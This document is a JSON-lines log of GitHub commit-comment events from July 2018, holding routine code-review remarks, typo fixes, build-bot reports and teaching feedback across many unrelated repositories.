{"id":"8045740053","type":"CommitCommentEvent","actor":{"login":"jvican"},"repo":{"name":"scala/docs.scala-lang"},"payload":{"comment":{"id":29908859,"position":32,"line":32,"path":"_sips/sips/2018-07-31-interpolation-quote-escape.md","commit_id":"56c1e819a459df4867ea6e3e40dfa57b09bf8113","created_at":"2018-07-31T18:03:03Z","updated_at":"2018-07-31T18:03:03Z","author_association":"MEMBER","body":"I think it would be ideal if you can link to this SO question to add more motivation for this change https://stackoverflow.com/questions/25632924/whats-the-difference-between-raw-string-interpolation-and-triple-quotes-in-scal"}},"created_at":"2018-07-31T18:03:03Z"}
{"id":"8045741437","type":"CommitCommentEvent","actor":{"login":"karthikms13"},"repo":{"name":"uday1902/ParkingPaymentService"},"payload":{"comment":{"id":29908861,"position":17,"line":17,"path":"src/test/java/devcraft/parking/policy/EscapePaymentPolicyTest.java","commit_id":"8f72117d6ec9ee972b86def248d318b2e9671818","created_at":"2018-07-31T18:03:18Z","updated_at":"2018-07-31T18:03:18Z","author_association":"NONE","body":"This is pretty neat, I never used it, what does this annotation do? "}},"created_at":"2018-07-31T18:03:18Z"}
{"id":"8045744175","type":"CommitCommentEvent","actor":{"login":"kerizane"},"repo":{"name":"Tuxemon/Tuxemon"},"payload":{"comment":{"id":29908868,"position":null,"line":null,"path":null,"commit_id":"d84dc85f6372d4a3653e97543e68fa5cee1a9afb","created_at":"2018-07-31T18:03:48Z","updated_at":"2018-07-31T18:03:48Z","author_association":"CONTRIBUTOR","body":"Happens on my 3 year old laptop with python2 and python3, doesn't happen on my fast desktop."}},"created_at":"2018-07-31T18:03:48Z"}
{"id":"8045746273","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"citron0137/-bob7-pcap_test-"},"payload":{"comment":{"id":29908875,"position":74,"line":74,"path":"confi.cpp","commit_id":"be19986162055a39ca09206d5bed779683642a45","created_at":"2018-07-31T18:04:12Z","updated_at":"2018-07-31T18:04:12Z","author_association":"NONE","body":"함수 작성하느리 힘들었겠지만, 오늘 수업 시간에 배웠으니 앞으로는 ntoh... 류의 함수를 사용하도록 하세요. ^^"}},"created_at":"2018-07-31T18:04:12Z"}
{"id":"8045748172","type":"CommitCommentEvent","actor":{"login":"kks32"},"repo":{"name":"cb-geo/mpm"},"payload":{"comment":{"id":29908886,"position":71,"line":78,"path":"include/material/bingham.tcc","commit_id":"fc40badccf18c345887a3389babc9dd790fd1f83","created_at":"2018-07-31T18:04:33Z","updated_at":"2018-07-31T18:04:33Z","author_association":"CONTRIBUTOR","body":"Is this the deviatoric change?"}},"created_at":"2018-07-31T18:04:33Z"}
{"id":"8045748629","type":"CommitCommentEvent","actor":{"login":"cyurek"},"repo":{"name":"cyurek/github-slideshow"},"payload":{"comment":{"id":29908888,"position":null,"line":null,"path":null,"commit_id":"4d804d6161e374e4d70757c2b67a3ea0f34157a6","created_at":"2018-07-31T18:04:38Z","updated_at":"2018-07-31T18:04:38Z","author_association":"OWNER","body":"---\r\nlayout: slide\r\ntitle: \"Welcome to our second slide!\"\r\n---\r\nYour text\r\nUse the left arrow to go back!"}},"created_at":"2018-07-31T18:04:38Z"}
{"id":"8045749529","type":"CommitCommentEvent","actor":{"login":"kks32"},"repo":{"name":"cb-geo/mpm"},"payload":{"comment":{"id":29908890,"position":68,"line":76,"path":"include/material/bingham.tcc","commit_id":"fc40badccf18c345887a3389babc9dd790fd1f83","created_at":"2018-07-31T18:04:47Z","updated_at":"2018-07-31T18:04:47Z","author_association":"CONTRIBUTOR","body":"Could you please add the equation you are computing."}},"created_at":"2018-07-31T18:04:47Z"}
{"id":"8045749637","type":"CommitCommentEvent","actor":{"login":"khanariba"},"repo":{"name":"khanariba/wdl"},"payload":{"comment":{"id":29908891,"position":3,"line":3,"path":"resume.json","commit_id":"9e3612529826e90219780153fdb73cc1847223e6","created_at":"2018-07-31T18:04:48Z","updated_at":"2018-07-31T18:04:48Z","author_association":"OWNER","body":"pakrariba0612"}},"created_at":"2018-07-31T18:04:48Z"}
{"id":"8045750212","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"citron0137/-bob7-pcap_test-"},"payload":{"comment":{"id":29908892,"position":91,"line":91,"path":"confi.cpp","commit_id":"be19986162055a39ca09206d5bed779683642a45","created_at":"2018-07-31T18:04:54Z","updated_at":"2018-07-31T18:04:54Z","author_association":"NONE","body":"if (size > 16) size = 16;\r\nfor(i =0; i < size; i++)\r\n요렇게 짜는 게 좋을 겁니다."}},"created_at":"2018-07-31T18:04:54Z"}
{"id":"8045751147","type":"CommitCommentEvent","actor":{"login":"karthikms13"},"repo":{"name":"uday1902/ParkingPaymentService"},"payload":{"comment":{"id":29908896,"position":18,"line":18,"path":"src/main/java/devcraft/parking/policy/DailyPaymentPolicy.java","commit_id":"8f72117d6ec9ee972b86def248d318b2e9671818","created_at":"2018-07-31T18:05:05Z","updated_at":"2018-07-31T18:05:05Z","author_association":"NONE","body":"Long has an intValue method"}},"created_at":"2018-07-31T18:05:05Z"}
{"id":"8045752599","type":"CommitCommentEvent","actor":{"login":"chiraag-nataraj"},"repo":{"name":"netblue30/firejail"},"payload":{"comment":{"id":29908899,"position":null,"line":null,"path":null,"commit_id":"123b2b1e256a17425afa32b238a9c448184f065b","created_at":"2018-07-31T18:05:20Z","updated_at":"2018-07-31T18:05:20Z","author_association":"COLLABORATOR","body":"How about only displaying those when `--debug` is enabled?"}},"created_at":"2018-07-31T18:05:20Z"}
{"id":"8045753158","type":"CommitCommentEvent","actor":{"login":"mgehre"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29908900,"position":34,"line":34,"path":"include/clang/Analysis/Analyses/Lifetime.h","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T18:05:26Z","updated_at":"2018-07-31T18:05:26Z","author_association":"OWNER","body":"This is a quick hack from the cto clang translation. I used to have `diag(Loc,` diagnostic) << parameters` in the Lifetime checker itself, but now needed to move everything here because the Analysis lib does not link to Sema lib for Sema::Diag. Will cleanup"}},"created_at":"2018-07-31T18:05:26Z"}
{"id":"8045754114","type":"CommitCommentEvent","actor":{"login":"EmmaNguyen"},"repo":{"name":"EmmaNguyen/feature_adversarial_with_topology_signatures"},"payload":{"comment":{"id":29908903,"position":null,"line":null,"path":null,"commit_id":"d43853e6d40f640277ddfeb5c61f7138adcf14b0","created_at":"2018-07-31T18:05:37Z","updated_at":"2018-07-31T18:05:37Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Code: Implement of GW-GAN::lazy implementation](https://trello.com/c/InVik5l4/109-code-implement-of-gw-ganlazy-implementation)"}},"created_at":"2018-07-31T18:05:37Z"}
{"id":"8045755536","type":"CommitCommentEvent","actor":{"login":"EmmaNguyen"},"repo":{"name":"EmmaNguyen/feature_adversarial_with_topology_signatures"},"payload":{"comment":{"id":29908906,"position":null,"line":null,"path":null,"commit_id":"ae8a93ad6c50feada591a2b73e520c39b6ea5f0f","created_at":"2018-07-31T18:05:51Z","updated_at":"2018-07-31T18:05:51Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Code: Implement of GW-GAN::lazy implementation](https://trello.com/c/InVik5l4/109-code-implement-of-gw-ganlazy-implementation)"}},"created_at":"2018-07-31T18:05:51Z"}
{"id":"8045756500","type":"CommitCommentEvent","actor":{"login":"ankakusu"},"repo":{"name":"merveer/flight-checkin"},"payload":{"comment":{"id":29908907,"position":73,"line":62,"path":"checkin/src/components/checkin.vue","commit_id":"8400eee33a0ee6abc24f70c1216340a773d78932","created_at":"2018-07-31T18:06:02Z","updated_at":"2018-07-31T18:06:02Z","author_association":"NONE","body":"should be \"disableButton\""}},"created_at":"2018-07-31T18:06:02Z"}
{"id":"8045757359","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"citron0137/-bob7-pcap_test-"},"payload":{"comment":{"id":29908908,"position":144,"line":144,"path":"confi.cpp","commit_id":"be19986162055a39ca09206d5bed779683642a45","created_at":"2018-07-31T18:06:11Z","updated_at":"2018-07-31T18:06:11Z","author_association":"NONE","body":"hdrIPv4->Protocol 값을 TCP, ICMP, UDP 일일이 비교하는 것보다 switch 사용을 권장합니다."}},"created_at":"2018-07-31T18:06:11Z"}
{"id":"8045757546","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29908909,"position":null,"line":null,"path":null,"commit_id":"3bee0236de014dd863b9602e6bd9281b214f71ae","created_at":"2018-07-31T18:06:13Z","updated_at":"2018-07-31T18:06:13Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-308](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-308).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-308-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-31T18:06:13Z"}
{"id":"8045758978","type":"CommitCommentEvent","actor":{"login":"talhasch"},"repo":{"name":"esteemapp/esteem-surfer"},"payload":{"comment":{"id":29908915,"position":null,"line":null,"path":null,"commit_id":"3dd73de76669892f9c4a11536fd0363f55ff7a99","created_at":"2018-07-31T18:06:29Z","updated_at":"2018-07-31T18:06:29Z","author_association":"CONTRIBUTOR","body":"lets try..."}},"created_at":"2018-07-31T18:06:29Z"}
{"id":"8045759487","type":"CommitCommentEvent","actor":{"login":"memononen"},"repo":{"name":"Pomax/processing-bezier-master"},"payload":{"comment":{"id":29908916,"position":null,"line":null,"path":null,"commit_id":"0f8b5c64fa20cd7fefa859ed9f38f8dc48aab68c","created_at":"2018-07-31T18:06:35Z","updated_at":"2018-07-31T18:06:35Z","author_association":"NONE","body":"I don't know. My best bet is that since `getCount()` returns an int, there is some kind of accumulation somewhere, so you get a full count once enough smaller \"counts\" have been accumulated. On OSX the touchpad has inertia, so you usually have a lot of small wheel events."}},"created_at":"2018-07-31T18:06:35Z"}
{"id":"8045759695","type":"CommitCommentEvent","actor":{"login":"hparfr"},"repo":{"name":"akretion/ak-odoo-incubator"},"payload":{"comment":{"id":29908917,"position":53,"line":231,"path":"stock_orderpoint_traffic_lights/models/stock_warehouse_orderpoint.py","commit_id":"28b49041e39cc3fa362bb50fae63091d73893f61","created_at":"2018-07-31T18:06:37Z","updated_at":"2018-07-31T18:06:37Z","author_association":"MEMBER","body":"ça serait pas max(rec.product_max_qty, future_stock) ?"}},"created_at":"2018-07-31T18:06:37Z"}
{"id":"8045760100","type":"CommitCommentEvent","actor":{"login":"kks32"},"repo":{"name":"cb-geo/mpm"},"payload":{"comment":{"id":29908918,"position":56,"line":57,"path":"include/material/bingham.tcc","commit_id":"fc40badccf18c345887a3389babc9dd790fd1f83","created_at":"2018-07-31T18:06:42Z","updated_at":"2018-07-31T18:06:42Z","author_association":"CONTRIBUTOR","body":"This is only valid for 3D case, what about 2D?"}},"created_at":"2018-07-31T18:06:42Z"}
{"id":"8045763090","type":"CommitCommentEvent","actor":{"login":"an-ju"},"repo":{"name":"adnanhemani/planning-poker"},"payload":{"comment":{"id":29908924,"position":null,"line":null,"path":null,"commit_id":"0ab5d8fb567cbd0dadccbbc3087c2d9078b51022","created_at":"2018-07-31T18:07:16Z","updated_at":"2018-07-31T18:07:16Z","author_association":"COLLABORATOR","body":"It looks good to me.  I'm a bit confused as to how do we know if the hangout session is ready, since the removal of the lock relies on knowing this info."}},"created_at":"2018-07-31T18:07:16Z"}
{"id":"8045766046","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29908932,"position":null,"line":null,"path":null,"commit_id":"34a0f8f3430d7061c304a7882904b6b8a69abd20","created_at":"2018-07-31T18:07:49Z","updated_at":"2018-07-31T18:07:49Z","author_association":"NONE","body":"#158531941-VerticalVenetianBlindCoefficients (vidanovic) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1707 of 1707 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a0f8f3430d7061c304a7882904b6b8a69abd20-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a0f8f3430d7061c304a7882904b6b8a69abd20-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a0f8f3430d7061c304a7882904b6b8a69abd20-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.41%25-green.png)</a>\n"}},"created_at":"2018-07-31T18:07:49Z"}
{"id":"8045766745","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"limelee85/pcap_test85"},"payload":{"comment":{"id":29908936,"position":112,"line":112,"path":"main.cpp","commit_id":"3536559616397b959498f60098e51f2b25ed6403","created_at":"2018-07-31T18:07:56Z","updated_at":"2018-07-31T18:07:56Z","author_association":"NONE","body":"오늘 수업 시간에 얘기했죠?\r\n%s %s 에 동일한 값 출력되는지 디버깅 한번 해 보세요. ^^"}},"created_at":"2018-07-31T18:07:56Z"}
{"id":"8045769026","type":"CommitCommentEvent","actor":{"login":"kks32"},"repo":{"name":"cb-geo/mpm"},"payload":{"comment":{"id":29908942,"position":8,"line":244,"path":"include/particle.tcc","commit_id":"fc40badccf18c345887a3389babc9dd790fd1f83","created_at":"2018-07-31T18:08:21Z","updated_at":"2018-07-31T18:08:21Z","author_association":"CONTRIBUTOR","body":"Isn't the strain rate already computed?  in `compute_strain`, so no need to recalculate. Just return strain_rate. "}},"created_at":"2018-07-31T18:08:21Z"}
{"id":"8045769301","type":"CommitCommentEvent","actor":{"login":"mak2141"},"repo":{"name":"mak2141/TokenContract"},"payload":{"comment":{"id":29908944,"position":null,"line":null,"path":null,"commit_id":"e61b7bbd8e4909d203e46209f3e6e693de1a91df","created_at":"2018-07-31T18:08:24Z","updated_at":"2018-07-31T18:08:24Z","author_association":"OWNER","body":"Lets make this convertible"}},"created_at":"2018-07-31T18:08:24Z"}
{"id":"8045770823","type":"CommitCommentEvent","actor":{"login":"karthikms13"},"repo":{"name":"uday1902/ParkingPaymentService"},"payload":{"comment":{"id":29908952,"position":105,"line":43,"path":"src/main/java/devcraft/parking/PaymentService.java","commit_id":"8f72117d6ec9ee972b86def248d318b2e9671818","created_at":"2018-07-31T18:08:42Z","updated_at":"2018-07-31T18:08:42Z","author_association":"NONE","body":"Looks good! Couple of issues though \r\n1. Uncle Bob wouldn't like a method named newCalcPayment\r\n2. We have to modify this method if/when we add a new PaymentPolicy"}},"created_at":"2018-07-31T18:08:42Z"}
{"id":"8045770921","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"limelee85/pcap_test85"},"payload":{"comment":{"id":29908953,"position":114,"line":114,"path":"main.cpp","commit_id":"3536559616397b959498f60098e51f2b25ed6403","created_at":"2018-07-31T18:08:43Z","updated_at":"2018-07-31T18:08:43Z","author_association":"NONE","body":"tcp 위치의 계산은 packet을 이용하지 말고 ip만 이용해서 계산하세요."}},"created_at":"2018-07-31T18:08:43Z"}
{"id":"8045773565","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"limelee85/pcap_test85"},"payload":{"comment":{"id":29908958,"position":126,"line":126,"path":"main.cpp","commit_id":"3536559616397b959498f60098e51f2b25ed6403","created_at":"2018-07-31T18:09:13Z","updated_at":"2018-07-31T18:09:13Z","author_association":"NONE","body":"16 > min(실제 TCP 데이터 크기, 16)"}},"created_at":"2018-07-31T18:09:13Z"}
{"id":"8045776091","type":"CommitCommentEvent","actor":{"login":"mgehre"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29908966,"position":78,"line":78,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T18:09:40Z","updated_at":"2018-07-31T18:09:40Z","author_association":"OWNER","body":"Excluding base classes was not intended. Is there an easy way to iterate over all methods including base classes but excluding hidden methods?\r\nI would propose to defer optimization to a later stage where I will do some profiling."}},"created_at":"2018-07-31T18:09:40Z"}
{"id":"8045780052","type":"CommitCommentEvent","actor":{"login":"adnanhemani"},"repo":{"name":"adnanhemani/planning-poker"},"payload":{"comment":{"id":29908976,"position":null,"line":null,"path":null,"commit_id":"0ab5d8fb567cbd0dadccbbc3087c2d9078b51022","created_at":"2018-07-31T18:10:25Z","updated_at":"2018-07-31T18:10:25Z","author_association":"OWNER","body":"The method call to create the Hangouts session is a blocking one, which is why we will have to place it on a asynchronous thread of its own. After the call is complete and before we join that new thread back, we can release the lock "}},"created_at":"2018-07-31T18:10:25Z"}
{"id":"8045783273","type":"CommitCommentEvent","actor":{"login":"lgtyqz"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29908980,"position":null,"line":null,"path":null,"commit_id":"dd613d632d288193c76e97041fb82c79270970ee","created_at":"2018-07-31T18:11:02Z","updated_at":"2018-07-31T18:11:02Z","author_association":"CONTRIBUTOR","body":"holy moly\r\nThat's a lot of code\r\nGreat job"}},"created_at":"2018-07-31T18:11:02Z"}
{"id":"8045783406","type":"CommitCommentEvent","actor":{"login":"ewilde"},"repo":{"name":"burtonr/templates"},"payload":{"comment":{"id":29908982,"position":1,"line":1,"path":"verify.sh","commit_id":"a1dc9ac19cc689eeb0c7070aeb559e4d6122ca9a","created_at":"2018-07-31T18:11:03Z","updated_at":"2018-07-31T18:11:03Z","author_association":"NONE","body":"Did you mean to use this shebang i've seen it cause problems when people are use `bash` features not supported by the bourne shell or dash\r\n\r\n> Please do not be fooled by scripts or examples on the Internet that use /bin/sh as the interpreter. sh is not bash! Bash itself is a \"sh-compatible\" shell (meaning that it can run most 'sh' scripts and carries much of the same syntax) however, the opposite is not true; some features of Bash will break or cause unexpected behavior in sh.\r\n\r\nhttp://mywiki.wooledge.org/BashGuide/CommandsAndArguments#Scripts\r\n\r\nMaybe best to target bash\r\n\r\ni.e. `#!/usr/bin/env bash`"}},"created_at":"2018-07-31T18:11:03Z"}
{"id":"8045784392","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29908984,"position":30,"line":36,"path":"Lesson3/train.rb","commit_id":"1de66a1065674c9321bc02be2dd62f9250945613","created_at":"2018-07-31T18:11:14Z","updated_at":"2018-07-31T18:11:14Z","author_association":"NONE","body":"видимо `unless` случайно здесь оказался"}},"created_at":"2018-07-31T18:11:14Z"}
{"id":"8045785442","type":"CommitCommentEvent","actor":{"login":"amendelzon"},"repo":{"name":"rsksmart/RSKIPs"},"payload":{"comment":{"id":29908990,"position":10,"line":24,"path":"IPs/RSKIP87.md","commit_id":"a4ae1a41abb432c665f5ada46e93fa7a34e6bc82","created_at":"2018-07-31T18:11:26Z","updated_at":"2018-07-31T18:11:26Z","author_association":"NONE","body":"\"to make\" => \"making\""}},"created_at":"2018-07-31T18:11:26Z"}
{"id":"8045788849","type":"CommitCommentEvent","actor":{"login":"amendelzon"},"repo":{"name":"rsksmart/RSKIPs"},"payload":{"comment":{"id":29908997,"position":10,"line":24,"path":"IPs/RSKIP87.md","commit_id":"a4ae1a41abb432c665f5ada46e93fa7a34e6bc82","created_at":"2018-07-31T18:12:06Z","updated_at":"2018-07-31T18:12:06Z","author_association":"NONE","body":"\"query to know...\" => \"query method to gain information on the whitelisting state of a given address\""}},"created_at":"2018-07-31T18:12:06Z"}
{"id":"8045790779","type":"CommitCommentEvent","actor":{"login":"amendelzon"},"repo":{"name":"rsksmart/RSKIPs"},"payload":{"comment":{"id":29908998,"position":20,"line":31,"path":"IPs/RSKIP87.md","commit_id":"a4ae1a41abb432c665f5ada46e93fa7a34e6bc82","created_at":"2018-07-31T18:12:29Z","updated_at":"2018-07-31T18:12:29Z","author_association":"NONE","body":"\"whitelist\" => \"whitelisting\""}},"created_at":"2018-07-31T18:12:29Z"}
{"id":"8045795294","type":"CommitCommentEvent","actor":{"login":"talhasch"},"repo":{"name":"esteemapp/esteem-surfer"},"payload":{"comment":{"id":29909008,"position":null,"line":null,"path":null,"commit_id":"3dd73de76669892f9c4a11536fd0363f55ff7a99","created_at":"2018-07-31T18:13:20Z","updated_at":"2018-07-31T18:13:20Z","author_association":"CONTRIBUTOR","body":"i think looking better. what you say @fildunsky @feruzm ?\r\n![image](https://user-images.githubusercontent.com/1177676/43478388-6ffeb9f2-9506-11e8-9cd7-0db39de66d69.png)\r\n"}},"created_at":"2018-07-31T18:13:20Z"}
{"id":"8045796118","type":"CommitCommentEvent","actor":{"login":"amendelzon"},"repo":{"name":"rsksmart/RSKIPs"},"payload":{"comment":{"id":29909012,"position":20,"line":31,"path":"IPs/RSKIP87.md","commit_id":"a4ae1a41abb432c665f5ada46e93fa7a34e6bc82","created_at":"2018-07-31T18:13:29Z","updated_at":"2018-07-31T18:13:29Z","author_association":"NONE","body":"Maybe remove the second item, and just append to the first one something like \", without any changes in its actual behavior\"?"}},"created_at":"2018-07-31T18:13:29Z"}
{"id":"8045797536","type":"CommitCommentEvent","actor":{"login":"pilbit"},"repo":{"name":"pilbit/Biblioteka"},"payload":{"comment":{"id":29909017,"position":4,"line":4,"path":"nbproject/private/private.xml","commit_id":"252ba02ca5efc4d5945105c774c19d9db2dd65ab","created_at":"2018-07-31T18:13:46Z","updated_at":"2018-07-31T18:13:46Z","author_association":"OWNER","body":"ocb\r\n"}},"created_at":"2018-07-31T18:13:46Z"}
{"id":"8045798634","type":"CommitCommentEvent","actor":{"login":"amendelzon"},"repo":{"name":"rsksmart/RSKIPs"},"payload":{"comment":{"id":29909020,"position":26,"line":36,"path":"IPs/RSKIP87.md","commit_id":"a4ae1a41abb432c665f5ada46e93fa7a34e6bc82","created_at":"2018-07-31T18:14:00Z","updated_at":"2018-07-31T18:14:00Z","author_association":"NONE","body":"\"returns\" => \"will return\""}},"created_at":"2018-07-31T18:14:00Z"}
{"id":"8045802745","type":"CommitCommentEvent","actor":{"login":"amendelzon"},"repo":{"name":"rsksmart/RSKIPs"},"payload":{"comment":{"id":29909030,"position":29,"line":38,"path":"IPs/RSKIP87.md","commit_id":"a4ae1a41abb432c665f5ada46e93fa7a34e6bc82","created_at":"2018-07-31T18:14:46Z","updated_at":"2018-07-31T18:14:46Z","author_association":"NONE","body":"\"if it isn't it will add\" => \"will add\""}},"created_at":"2018-07-31T18:14:46Z"}
{"id":"8045807521","type":"CommitCommentEvent","actor":{"login":"PresentKim"},"repo":{"name":"PresentKim/LocalChat-PMMP"},"payload":{"comment":{"id":29909040,"position":null,"line":null,"path":null,"commit_id":"812338a4337acb2af8e7a93be2cfdf2a70fe59fb","created_at":"2018-07-31T18:15:41Z","updated_at":"2018-07-31T18:15:41Z","author_association":"OWNER","body":"https://www.shareicon.net/chat-2-101377"}},"created_at":"2018-07-31T18:15:41Z"}
{"id":"8045810086","type":"CommitCommentEvent","actor":{"login":"p3p"},"repo":{"name":"p3p/Marlin"},"payload":{"comment":{"id":29909050,"position":null,"line":null,"path":null,"commit_id":"b5447f5b71a890144228cb34b9422b19e66d7cde","created_at":"2018-07-31T18:16:11Z","updated_at":"2018-07-31T18:16:11Z","author_association":"OWNER","body":"I can't do that, the framework is now external to Marlin, (like any other platform), the pins will always visible even if the serial port is in use by Marlin."}},"created_at":"2018-07-31T18:16:11Z"}
{"id":"8045811546","type":"CommitCommentEvent","actor":{"login":"pilbit"},"repo":{"name":"pilbit/Biblioteka"},"payload":{"comment":{"id":29909060,"position":5,"line":5,"path":"nbproject/private/private.xml","commit_id":"252ba02ca5efc4d5945105c774c19d9db2dd65ab","created_at":"2018-07-31T18:16:27Z","updated_at":"2018-07-31T18:16:27Z","author_association":"OWNER","body":"5 lines\r\n"}},"created_at":"2018-07-31T18:16:27Z"}
{"id":"8045812679","type":"CommitCommentEvent","actor":{"login":"doudou"},"repo":{"name":"rock-planning/planning-vfh_star"},"payload":{"comment":{"id":29909062,"position":null,"line":null,"path":null,"commit_id":"11c84beef9f881193da34303c8a8d99907751a36","created_at":"2018-07-31T18:16:41Z","updated_at":"2018-07-31T18:16:41Z","author_association":"MEMBER","body":"This package is part of the Rock framework (www.rock-robotics.org). You can build it separately from the rest of the framework, but you will then have to checkout and manually build its dependencies.\r\n\r\nThe dependencies from this package are defined in its `manifest.xml` file. See https://www.rock-robotics.org/documentation/packages/outside_of_rock.html for more information"}},"created_at":"2018-07-31T18:16:41Z"}
{"id":"8045812751","type":"CommitCommentEvent","actor":{"login":"ewilde"},"repo":{"name":"burtonr/templates"},"payload":{"comment":{"id":29909063,"position":2,"line":2,"path":"verify.sh","commit_id":"a1dc9ac19cc689eeb0c7070aeb559e4d6122ca9a","created_at":"2018-07-31T18:16:41Z","updated_at":"2018-07-31T18:16:41Z","author_association":"NONE","body":"I would put\r\n`set -e` at the top of this script, that way if you encounter errors the script will exit with a non-zero return code and fail the build pipeline; otherwise if the script encounters errors it will continue execution and return code will be zero"}},"created_at":"2018-07-31T18:16:41Z"}
{"id":"8045813009","type":"CommitCommentEvent","actor":{"login":"Shubham6059"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29909064,"position":null,"line":null,"path":null,"commit_id":"43a1596a48521beee160f937988a5c564519dbb5","created_at":"2018-07-31T18:16:43Z","updated_at":"2018-07-31T18:16:43Z","author_association":"NONE","body":"In the video, it has been mentioned to use `NumbersActivity.this` instead of `this`, while both refer a context. Why so?"}},"created_at":"2018-07-31T18:16:43Z"}
{"id":"8045816890","type":"CommitCommentEvent","actor":{"login":"thinkseven"},"repo":{"name":"thinkseven/reactnd-redux-todos-goals"},"payload":{"comment":{"id":29909075,"position":16,"line":393,"path":"index.html","commit_id":"66fae5435d7ea657a6e6b304cd6cdd5946195ae8","created_at":"2018-07-31T18:17:30Z","updated_at":"2018-07-31T18:17:30Z","author_association":"OWNER","body":"replaced with \r\n const ConnectedTodos = connect((state) => ({\r\n        todos: state.todos\r\n      }))(Todos)"}},"created_at":"2018-07-31T18:17:30Z"}
{"id":"8045817549","type":"CommitCommentEvent","actor":{"login":"amendelzon"},"repo":{"name":"rsksmart/RSKIPs"},"payload":{"comment":{"id":29909076,"position":46,"line":50,"path":"IPs/RSKIP87.md","commit_id":"a4ae1a41abb432c665f5ada46e93fa7a34e6bc82","created_at":"2018-07-31T18:17:38Z","updated_at":"2018-07-31T18:17:38Z","author_association":"NONE","body":"\"prevously\" => \"previously\"\r\n\"sucessful\" => \"successful\""}},"created_at":"2018-07-31T18:17:38Z"}
{"id":"8045819592","type":"CommitCommentEvent","actor":{"login":"thinkseven"},"repo":{"name":"thinkseven/reactnd-redux-todos-goals"},"payload":{"comment":{"id":29909077,"position":51,"line":442,"path":"index.html","commit_id":"66fae5435d7ea657a6e6b304cd6cdd5946195ae8","created_at":"2018-07-31T18:18:00Z","updated_at":"2018-07-31T18:18:00Z","author_association":"OWNER","body":"replaced with \r\nconst ConnectedGoals = connect((state) => ({\r\n        goals: state.goals\r\n      }))(Goals)"}},"created_at":"2018-07-31T18:18:00Z"}
{"id":"8045823931","type":"CommitCommentEvent","actor":{"login":"burtonr"},"repo":{"name":"burtonr/templates"},"payload":{"comment":{"id":29909092,"position":1,"line":1,"path":"verify.sh","commit_id":"a1dc9ac19cc689eeb0c7070aeb559e4d6122ca9a","created_at":"2018-07-31T18:18:52Z","updated_at":"2018-07-31T18:18:52Z","author_association":"OWNER","body":"This was in fact intentional as this will be run in a CI environment. Specifically, TravisCI (as with the other OpenFaaS projects)\r\n\r\nFrom the TravisCI [Docs](https://docs.travis-ci.com/user/customizing-the-build/):\r\n> When using custom scripts they should be executable (for example, using chmod +x) and contain a valid shebang line such as /usr/bin/env sh, /usr/bin/env ruby, or /usr/bin/env python."}},"created_at":"2018-07-31T18:18:52Z"}
{"id":"8045824850","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29909098,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-31T18:19:03Z","updated_at":"2018-07-31T18:19:03Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-31T18:19:03Z"}
{"id":"8045827999","type":"CommitCommentEvent","actor":{"login":"amendelzon"},"repo":{"name":"rsksmart/RSKIPs"},"payload":{"comment":{"id":29909104,"position":49,"line":52,"path":"IPs/RSKIP87.md","commit_id":"a4ae1a41abb432c665f5ada46e93fa7a34e6bc82","created_at":"2018-07-31T18:19:38Z","updated_at":"2018-07-31T18:19:38Z","author_association":"NONE","body":"- \", the caveat is\" => either \"; the caveat being\" or \". The caveat is\"\r\n- I'd change \"consumer\" to \"user\"\r\n- \"call to the\" => \"call the\"\r\n- \"when this address shouldn't remain whitelisted anymore\" => \"to prevent further locks from this address\"."}},"created_at":"2018-07-31T18:19:38Z"}
